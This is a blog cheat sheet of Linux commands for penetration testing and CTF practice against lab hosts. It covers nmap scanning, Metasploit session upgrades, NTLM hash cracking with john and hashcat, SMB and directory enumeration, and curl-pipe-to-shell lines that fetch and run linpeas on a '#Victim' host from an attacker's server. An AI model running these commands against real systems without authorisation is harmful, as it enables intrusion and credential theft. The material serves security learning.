· Abhinav Kumar · Hacking 101 · 2 min read
Linux Commands for Hacking and Security
Linux commands and shortcuts very often used by Hackers, Security professionals, CTF Players.
Linux commands that are often used by hackers, security professional and CTF players. We will avoid any payloads or oneliner exploits ( will cover in different page sometime). Updated - October 02, 2023.
Table of Contents
- Add Target to hosts file
- Nmap
- Metasploit
- Cracking hash with hashcat
- Extract Files
- SSH Connection
- Text Filter
- SMB Enumeration
- netcat
- Linpeas
- Python Simple HTTP Server
- Wordpress CMS Vulnerabilty Scanning
- Directory Enumeration
- Reading a File
- Replace in File
Add Target to hosts file
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ echo '10.10.196.20 blue.thm' | sudo tee -a /etc/hosts
[sudo] password for abhinav:
10.10.196.20 blue.thm
Nmap
#for TCP Scan
sudo nmap -sC -sV -p- -T5 -Pn targethost
#for UDP Scan
sudo nmap -sU -sV -p- -T5 -Pn targethost
# Store scan results for ports separated by comma.
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ ports=$(nmap -p- --min-rate=1000 -T4 cronos.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
# Check which ports are found
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ echo $ports
22,53,80,9227,19041,30100
# Pass the information in -p argument as $ports
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sC -sV -A -O -T5 -p$ports cronos.htb
Metasploit
Start Metasploit with database
# Pass the information in -p argument as $ports
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ systemctl start postgresql
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ msfdb init
Creating database user 'msf'
Enter password for new role:
Enter it again:
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema
Metasploit Shell Upgrade to Meterpreter
sessions -u 3
sessions -u -1
use post/multi/manage/shell_to_meterpreter
run session=-1
Cracking hash with John
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ john hash --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
Cracking hash with hashcat
Windows NTLM Hash
hashcat -m 1000 -a 0 hash /usr/share/wordlists/rockyou.txt.gz
Extract Files
Gz Files
gunzip archive.gz
tar Files
tar –xvzf archive.tar.gz
SSH Connection
ssh username@host -oHostKeyAlgorithms=+ssh-dss
Text Filter
grep -i #]- inlcude
grep -v #]- exclude
SMB Enumeration
nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target_HOST
smbclient //IP/directory
Mount NFS Share
make directory locally and mount it
mkdir /mnt/sampleDIR
sudo mount IP:/folder /mnt/sampleDIR
netcat
get version via banner
nc IP port
Linpeas
From github
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Python Simple HTTP Server
python3 -m http.server 7777
curl 10.10.10.10/linpeas.sh | sh #Victim
Wordpress CMS Vulnerabilty Scanning
wpscan --url https://brainfuck.htb --disable-tls-checks
Directory Enumeration
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://cronos.htb/FUZZ -mc 200,403 -c -t 400
┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ gobuster dir -u http://cronos.htb/ --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 200 --quiet
Reading a File
cat
head
head -20 filepathandname
tail filename
tail -20 filename
cat filename | grep "word_to_filter"
more
less
Replace in File
sed /s/wordtoreplace/wordtoreplacewith/g /filepath > outputfilepath
Share:
